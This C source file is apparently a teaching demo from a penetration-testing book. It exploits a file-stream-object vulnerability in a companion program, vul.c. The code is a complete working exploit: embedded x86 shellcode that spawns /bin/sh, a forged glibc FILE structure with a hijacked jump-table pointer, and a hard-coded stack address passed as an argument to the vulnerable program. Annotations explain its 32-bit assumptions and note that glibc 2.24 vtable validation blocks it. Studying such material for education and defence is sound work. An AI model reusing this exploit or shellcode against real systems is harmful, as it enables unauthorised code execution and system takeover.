/* fso_exploit.c
*
* 《网络渗透技术》演示程序
* 作者:san, alert7, eyas, watercloud
*
* 针对vul.c的FSO漏洞利用程序
*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#define FUNCTIONOFFSET 0x1c //get from call *0x1c(%eax)
#define OFFSET1 0x46 //get from movsbl 0x46(%edx),%eax //this import
#define OFFSET2 8 //程序构造的原因,固定为8
/* Payload bytes copied into the forged stream buffer by main() (see the
 * memcpy there).  The original author labels them as an x86 Linux execve
 * of "/bin//sh"; that is not verified here.  Two properties main() relies
 * on: the array contains no 0x00 byte (strlen() is used as its length, and
 * the whole buffer is later passed as a C string), and it is short enough
 * to fit inside the region that main() initialises. */
char shellcode[]= /* linux x86 execve of "/bin//sh" */
"\x31\xd2\x52\x68\x6e\x2f\x73\x68"
"\x68\x2f\x2f\x62\x69\x89\xe3\x52"
"\x53\x89\xe1\x8d\x42\x0b\xcd\x80";
/* Overlay describing a forged stdio FILE object.
 *
 * `data` is sized so that `file_jmps` lands on the last 4 bytes of a real
 * FILE, i.e. where the implementation keeps its jump-table (vtable) pointer
 * in the glibc layout this demo targets.  The "-4" hard-codes a 4-byte
 * pointer, so the layout is only meaningful for a 32-bit build; on any other
 * ABI, or on a glibc whose FILE layout differs, the overlay is wrong.
 *
 * Defender's note: the technique this struct enables (pointing the stream's
 * jump table at attacker-controlled memory) is exactly what the vtable
 * validation added to glibc 2.24 (_IO_vtable_check) was introduced to stop;
 * on such a libc the forged pointer is rejected before any entry is called.
 */
struct fake_file_stream{
char data[sizeof(FILE)-4];  /* byte-for-byte body of a FILE, minus the trailing pointer */
char * file_jmps;           /* overlays the stream's jump-table pointer */
};
/* Builds a single argv string for ./vul that, when the program copies it
 * onto its stack at the guessed address `fakefs_addr`, looks like a FILE
 * object whose jump table points back into the same buffer.
 *
 * Returns: never returns normally on a successful execl(); exits 0 if the
 * exec fails (the failure is not reported).
 *
 * Everything below assumes sizeof(long) == sizeof(char *) == 4 (32-bit
 * target, matching the x86 payload) and a fixed, predictable stack address;
 * with ASLR enabled the hard-coded address is just a guess.  argc/argv are
 * accepted but unused: the address argument is commented out.
 */
int main(int argc,char *argv[])
{
char buffer[4000];
struct fake_file_stream * fakep;
int i;
long fakefs_addr;
fakefs_addr = 0xbfffeb60;//atoll(argv[1]);  hard-coded guess; the original took it from argv[1]
//printf("fakefs_addr %u\n",fakefs_addr);
/* Fill the first 3000 bytes with the guessed address, 4 bytes at a time.
 * The remaining 1000 bytes of `buffer` are never initialised, so the
 * string handed to execl() below has no guaranteed terminator (reading
 * past the initialised region is undefined behaviour). */
for (i=0;i<3000;i+=4)
*(long *)&buffer[i]=fakefs_addr;
/* Reinterpret the start of the buffer as the forged FILE.  Both casts
 * (char[] -> long *, char[] -> struct *) rely on the compiler tolerating
 * the aliasing; nothing here guarantees alignment or strict-aliasing
 * correctness. */
fakep= (struct fake_file_stream *)buffer;
fakep->file_jmps =fakefs_addr;  /* long stored into a char *: no cast, relies on a 32-bit ABI */
/* Entry FUNCTIONOFFSET (0x1c) of the jump table -- which, because
 * file_jmps == fakefs_addr, is the buffer itself -- is made to point just
 * past the struct, where the payload is copied next.  OFFSET2 keeps the
 * two writes in sync; changing one without the other breaks the chain. */
*(long *)&fakep->data[FUNCTIONOFFSET]=fakefs_addr+ sizeof(struct fake_file_stream)+OFFSET2;
memcpy(buffer+sizeof(struct fake_file_stream)+OFFSET2,shellcode,strlen(shellcode));
/* Value read by the target's `movsbl 0x46(%edx),%eax` (per the OFFSET1
 * comment above); 0x04 in every byte so the result is 4 whichever byte is
 * selected. */
*(long *) &buffer[OFFSET1]=0x04040404; //make eax =4;
/* execl() is declared in <unistd.h>, which this file does not include; a
 * C99+ compiler rejects the implicit declaration.  The return value is not
 * checked, so a failed exec silently falls through to exit(0). */
execl("./vul", "vul", buffer, NULL);
exit(0);
}